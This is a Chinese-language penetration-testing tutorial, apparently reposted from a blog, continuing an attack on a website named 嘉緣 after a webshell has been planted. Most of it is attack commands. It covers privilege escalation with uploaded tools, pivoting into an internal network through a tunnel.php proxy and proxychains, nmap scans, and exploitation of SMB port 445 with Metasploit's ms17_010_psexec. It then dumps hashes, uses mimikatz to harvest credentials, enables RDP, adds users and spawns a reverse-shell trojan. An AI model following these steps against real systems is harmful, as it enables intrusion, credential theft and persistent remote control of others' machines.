【提權過程】嘉緣網站--提權,代理,內網滲透(針對445端口)


這篇是由上篇 【滲透過程】嘉緣網站--測試
https://www.cnblogs.com/G-Shadow/articles/10964374.html
之后的操作,文章包括了提權,HTTP代理及對內網的滲透

使用蟻劍連接上寫入的一句話后,使用虛擬終端發現自己權限為最高權限可以執行任何操作

 

這里講一下提權,假如權限不高,需要進行提權

首先:查看服務器的操作系統

如果這里為win2003,可以找台2003的機器把cmd.exe程序上傳到目標服務器

跳到該目錄下執行cmd 你會發現權限權限有所提升,可以執行一下基礎命令,但是還是無法執行新建用戶,開啟3389端口等命令

這時我們只需上傳提權工具如pr 巴西烤肉等

使用提取權工具進行命令的執行,這樣我們就達到提權的目的了

 

 接着上篇,當我們使用蟻劍進行執行Dos命令發現目標服務器存在2塊網卡

(這里蟻劍如果無法執行命令,可以上傳一個大馬)

 

而且發現在238段下還有內網服務器

arp -a

需要進行掛代理,只有這樣才能對內網服務器進行測試

 

代理設置:

(因為要對內網進行其他操作,所有這里只介紹如何給kali進行代理設置)

首先安裝:

 

安裝插件

安裝完成后

這里需要通過菜刀或蟻劍上傳所需的文件(網站為php站這里上傳tunnel.php)

上傳成功后進行監聽 ,監聽的終端不能關需要一直開啟

再次開啟一個終端  修改配置文件

把dynamic_chain前的#刪掉

同時在最下方加入  socks5 127.0.0.1 9632(這里的9632為你上方監聽的端口)之后退出保存

通過打開的網頁訪問內網IP 192.168.238.128  這時進行監聽的終端開始跑了並成功顯示探針 說明代理設置成功

如果監聽的終端沒有變化,網頁也沒顯示,需要進行以下操作,之后再次從終端打開瀏覽器

 

如果還不成功,請關機,從新啟動一下kali (修改的配置沒有運行成功,需要重啟)

添加路由 route add -net 192.168.90.0 netmask 255.255.255.0 dev eth0 route add -net 192.168.80.0 netmask 255.255.255.0 dev eth0 route add -net 192.168.90.0/24 gw 192.168.90.1 刪除路由 route del -net 192.168.80.0 netmask 255.255.255.0 dev eth0 

  

內網滲透

針對445端口

代理成功后,每此執行命令或使用軟件時 在命令前加上 proxychains

之后使用nmap開始對 192.168.238.129   129.168.238.130 進行端口掃描

proxychains nmap -vvv -n -sT -PN 192.168.238.129 proxychains nmap -vvv -n -sT -PN 192.168.238.130 

發現2個都開135 139 445端口  這里只對445進行   

192.168.238.129

 

192.168.238.130

 

對192.168.238.129:445

 使用kali的工具   

proxychains msfconsole //啟動MSF終端

 

使用攻擊模塊

search option //搜索相關工具和攻擊載荷 use use exploit/windows/smb/ms17_010_psexec //啟動該模塊 show options //查看相關信息

set RHOST 目標IP
set LHOST 本機IP
set threads 端口
exploit //執行 或者用run

執行成功后會返回meterpreter  當執行命令有可能不會回顯,因為有代理有可能返回的包會丟失 但是命令會執行

我們嘗試直接利用 getuid 和 getsystem 命令來提權

使用命令獲取hash值

run post/windows/gather/smart_hashdump

通過撞庫得到administrator的密碼  

使用得到密碼和賬戶使用kaili的遠程桌面進行連接

proxychains rdesktop IP //遠程連接 目標機需要開啟3389端口

 

run post/windows/manage/enable_rdp //開啟3389

run getgui -u xxxxx -p xxxxx //添加用戶

download c:\\1.txt //下載文件

upload ll.txt c:\ //上傳文件

cat 11.txt //查看文件

pwd //查詢當前路徑

sysinfo //顯示遠程主機的系統信息,顯示計算機、系統信息、結構、語言等信息

   介紹個神器 mimikatz :

   load mimikatz

   msv (獲取 hash 值)

   ssp (獲取明文信息)

   wdigest (獲取系統賬戶信息)

   mimikatz_command -f a:: (必須要以錯誤的模塊來讓正確的模塊顯示)

   mimikatz_command -f hash:: (獲取目標 hash)

 

如果直接使用開啟3389端口命令無法執行的話,可以在本地生產一個木馬文件通過上傳一個木馬文件

創建會話反彈會一個shell

從新開啟一個終端

 同時使用另一個終端上傳生成的exe程序 並執行

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM